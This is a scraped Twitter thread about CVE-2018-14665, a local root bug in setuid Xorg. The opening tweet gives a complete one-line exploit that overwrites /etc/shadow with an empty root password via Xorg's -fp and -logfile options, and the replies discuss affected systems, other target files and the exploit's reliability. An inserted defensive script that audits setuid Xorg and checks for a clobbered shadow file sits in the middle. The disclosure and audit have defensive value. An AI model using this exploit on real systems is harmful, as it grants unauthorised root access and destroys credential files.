Hacker Fantastic
CVE-2018-14665 - an LPE exploit via fits in a tweet: cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges. *BSD and any other Xorg desktop also affected.
Louis Dion-Marcil Oct 25
How? My arch's Xorg is not setuid root.
Hacker Fantastic Oct 25
It's setuid root on the proactive secure and many others... looks like a great disturbance in the force is afoot; this is a 2-second local root type of attack... with pretty stable results.
Will Dormann Oct 25
XOrg on OpenBSD (I tested 6.3) definitely clobbers root-owned files with this technique. :-/
some person Oct 25
Replying to @hackerfantastic
I prefer to hit .preload as my target, leaves less mess IMO. Sample exploit:
Hacker Fantastic Oct 25
LPE exploit for 6.4 works fine for me, run from a console with no xenodm running; should be fine on 6.3 too.
Hacker Fantastic Oct 25
Replying to @info_dox
werd, you used the same technique in an earlier exploit against gnu-screen - I use that bug in my training. You are using the default shell (presumed bash), which drops privileges on most systems using your technique after the shell execve's. It's less reliable that way.
pwned4ever Oct 26
Replying to @hackerfantastic
Very nice 👍 awesome work once again.
Hacker Fantastic Oct 26
Replying to @pwned4ever @nushinde
Bug found by - my contribution was noticing its 0day status in OpenBSD and making a PoC.
only root can do that Oct 26
Replying to @hackerfantastic
But an obvious hack, as shadow will be overwritten with rubbish that contains the X-Server log plus the line with the empty root password. So afterwards no other local account will work anymore...
Hacker Fantastic Oct 26
Replying to @devnull0000
The old file is backed up to /etc/shadow.old.
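An added audit script, written here and not posted by anyone in the thread, that checks the two things the replies above turn on: whether the Xorg binary is installed setuid root (the precondition for -logfile being a local root issue, which is why the Arch user was not affected) and whether /etc/shadow already carries an Xorg log header, with the shadow.old backup noted as mentioned above. The candidate binary paths are assumed common install locations.

```shell
#!/bin/sh
# Added defensive check, not code from the thread.
# XORG_CANDIDATES are assumed common locations; adjust for your distribution.
XORG_CANDIDATES="/usr/bin/Xorg /usr/libexec/Xorg /usr/X11R6/bin/Xorg /usr/bin/X"

# 0 if the file has the setuid bit set and is owned by root, 1 otherwise.
is_setuid_root() {
    [ -u "$1" ] || return 1
    [ "$(ls -ld "$1" | awk '{print $3}')" = "root" ]
}

# 0 if the file starts the way an Xorg server log does; a target clobbered
# via -logfile ends up containing that header, so this flags the overwrite.
looks_like_xorg_log() {
    grep -q 'X\.Org X Server' "$1" 2>/dev/null
}

# Report each candidate Xorg binary that would run with root privileges.
audit_xorg() {
    for f in $XORG_CANDIDATES; do
        [ -e "$f" ] || continue
        if is_setuid_root "$f"; then
            echo "RISK: $f is setuid root; -logfile can write root-owned files"
        else
            echo "ok:   $f is not setuid root"
        fi
    done
    return 0
}

# Flag sensitive files that already look overwritten; the thread notes the
# original shadow is left beside it as shadow.old, so point at it for recovery.
check_clobbered() {
    for t in "$@"; do
        if looks_like_xorg_log "$t"; then
            echo "ALERT: $t contains an Xorg log header (possible overwrite)"
            if [ -e "$t.old" ]; then
                echo "       backup $t.old present; compare it before restoring"
            fi
        fi
    done
    return 0
}

audit_xorg
check_clobbered /etc/shadow /etc/passwd
```

Mitigation on systems where Xorg does not need the setuid bit is to drop it (chmod u-s on the binary) or use a rootless Xorg setup; the script only reports.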
only root can do that Oct 26
Replying to @hackerfantastic
How convenient :-) I didn't discover the backup, just let a test file get overwritten.
Hacker Fantastic Oct 26
Replying to @devnull0000
Yeah, lots of ways to use this bug. Overwrite and partial control of a file is so 1999.